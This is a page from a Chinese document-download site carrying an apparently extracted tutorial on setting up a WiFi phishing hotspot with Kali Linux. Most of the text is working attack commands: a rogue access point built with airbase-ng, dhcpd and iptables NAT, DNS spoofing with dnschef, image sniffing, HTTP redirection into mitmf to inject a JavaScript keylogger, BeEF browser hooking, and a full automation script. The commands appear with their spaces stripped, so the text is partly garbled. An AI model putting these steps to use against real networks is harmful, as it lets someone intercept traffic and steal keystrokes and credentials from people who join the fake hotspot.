ImageVerifierCode 换一换
格式:DOCX , 页数:11 ,大小:511.44KB ,
资源ID:24085465      下载积分:3 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bdocx.com/down/24085465.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(利用Kali进行WiFi钓鱼测试实战学习.docx)为本站会员(b****4)主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(发送邮件至service@bdocx.com或直接QQ联系客服),我们立即给予删除!

利用Kali进行WiFi钓鱼测试实战学习.docx

1、利用Kali进行WiFi钓鱼测试实战学习写在前面注:此文具有攻击性,只能用于学习研究之用,禁止用于其他非法用途,否则后果自负. -Mrxn 20150612 搜集从至少一年前我就一直想在自己跑kali的笔记本上架个钓鱼热点。然而由于网上的教程的nat写得有问题,别人写好的脚本和我电脑有些互不待见,最接近成功的一次只做到了qq能聊天,XX都上不去。而最近忽然意识到了问题的所在,成功实现了建立wifi热点,dns劫持,js注入,图片嗅探,和BEEF结合对用户浏览器进行攻击测试。故写此文分享给大家,希望与之前的我有一样困惑的同志们能有所收获。建立热点工具:isc-dhcp-server ;Aircr

2、ack-ng套件;iptables建立过程:首先写dhcp配置文件/etc/dhcp/dhcpd.conf写入如下内容:authoritative;default-lease-time700;max-lease-time8000;subnet10.0.0.0netmask255.255.255.0optionrouters10.0.0.1;optionsubnet-mask255.255.255.0;optiondomain-name-servers10.0.0.1;range10.0.0.1010.0.0.100;这里以10.0.0.1作为网关和dns服务器地址。然后我们处理无线网卡ifco

3、nfigwlan1down#wlan1修改成你的网卡iwconfigwlan1modemonitorifconfigwlan1upairmon-ngstartwlan1上述命令可以防止出现:Error: Got channel -1, expected a value 0.然后用airbase建立热点airbase-ng-eFishing-c11mon0热点的网络流量会被虚拟到at0这块网卡上面ifconfigat0upifconfigat010.0.0.1netmask255.255.255.0routeadd-net10.0.0.0netmask255.255.255.0gw10.0.0.

4、1打开ip转发echo1/proc/sys/net/ipv4/ip_forward开启dhcpdhcpd-cf/etc/dhcp/dhcpd.conf-pf/var/run/dhcpd.pidat0serviceisc-dhcp-serverstart然后可以试着用手机连接,应该可以连上但上不了网于是配置NATiptables-tnat-APOSTROUTING-oeth0-jMASQUERADE#对eth0进行源natiptables-AFORWARD-iwlan1-oeth0-jACCEPT#把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面iptables-AFORWARD-ptc

5、p-syn-s10.0.0.0/24-jTCPMSS-set-mss1356#修改最大报文段长度注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里)(这里可能还是DNS错误,请看后文中的dns代理服务器搭建)劫持DNS工具:dnschef过程:dnschef-i10.0.0.1-nameserver210.73.64.1#53上述命令是以ip10.0.0.1(上文中的fakeap网关和DNS的ip)建立dns,对于所有请求转发到210.73.64.1进行解析。显然这只是个“代理”并没有劫持的功效于是我们进化:dnschef-fakedomains=,-fakeip=10.0.0.1-

6、i10.0.0.1-nameserver210.73.64.1#53把淘宝和XX解析到本机了。当然可以把更多规则写在文件里:剩下的大家自由发挥吧。p.s:这个和后文中mitmf冲突,mitmf识别http协议中的目的主机,进行转发,不受这个dns伪造影响。图片嗅探这是一个很好玩的功能工具:driftnet过程:driftnet-iat0然后程序会打开一个小窗口显示所有传输的图片:单击图片保存到/当然可以开启Adjunct mode:driftnet-iat0-a直接保存图片并显示文件名。劫持Web流量这个更好玩工具:BEEF;mitmf;iptables过程:先把80端口的流量劫持走(这里10

7、000是mitmf默认监听端口)iptables-tnat-APREROUTING-ptcp-destination-port80-jREDIRECT-to-port10000然后打开mitmfmitmf-iat0-replace-search-straaaaa-replace-strbbbbb#把所有网页中的aaaaa替换成bbbbb上图XX了aaaaa好吧不要恶作剧了,上干货mitmf-iat0-inject-js-url-jskeyloggermitmf在这里注入了js键盘记录器最后用BEEF测试用户浏览器吧!/usr/share/beef-xss/beef浏览器打开 ,初始用户名和密码

8、都是beefBEEF过于高深我还没玩得很清楚请大家自行探索。对了,不要忘了抓包最后是我写的脚本#清空iptablesiptables-tnat-Fiptables-tnat-Xiptables-tnat-PPREROUTINGACCEPTiptables-tnat-PPOSTROUTINGACCEPTiptables-tnat-POUTPUTACCEPTiptables-tmangle-Fiptables-tmangle-Xiptables-tmangle-PPREROUTINGACCEPTiptables-tmangle-PINPUTACCEPTiptables-tmangle-PFORWA

9、RDACCEPTiptables-tmangle-POUTPUTACCEPTiptables-tmangle-PPOSTROUTINGACCEPTiptables-Fiptables-Xiptables-PFORWARDACCEPTiptables-PINPUTACCEPTiptables-POUTPUTACCEPTiptables-traw-Fiptables-traw-Xiptables-traw-PPREROUTINGACCEPTiptables-traw-POUTPUTACCEPT#建立热点airmon-ngstopmon0ifconfigwlan1down#wlan1修改成你的网卡i

10、wconfigwlan1modemonitorifconfigwlan1upairmon-ngstartwlan1&sleep2gnome-terminal-xbash-cairbase-ng-eFishing-c11mon0#按需求修改sleep2ifconfigat0upifconfigat010.0.0.1netmask255.255.255.0ifconfigat0mtu1400routeadd-net10.0.0.0netmask255.255.255.0gw10.0.0.1echo1/proc/sys/net/ipv4/ip_forward#配置dhcpdhcpd-cf/etc/d

11、hcp/dhcpd.conf-pf/var/run/dhcpd.pidat0sleep2/etc/init.d/isc-dhcp-serverstart#natiptables-tnat-APOSTROUTING-oeth0-jMASQUERADEiptables-AFORWARD-iwlan1-oeth0-jACCEPTiptables-AFORWARD-ptcp-syn-s10.0.0.0/24-jTCPMSS-set-mss1356#劫持80iptables-tnat-APREROUTING-ptcp-destination-port80-jREDIRECT-to-port10000#劫持dnsgnome-terminal-xbash-cdnschef-i10.0.0.1-nameserver210.73.64.1#53#打开beef并进行80js键盘记录gnome-terminal-xbash-cmitmf-iat0-inject-js-url-jskeyloggerbeef-xss

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1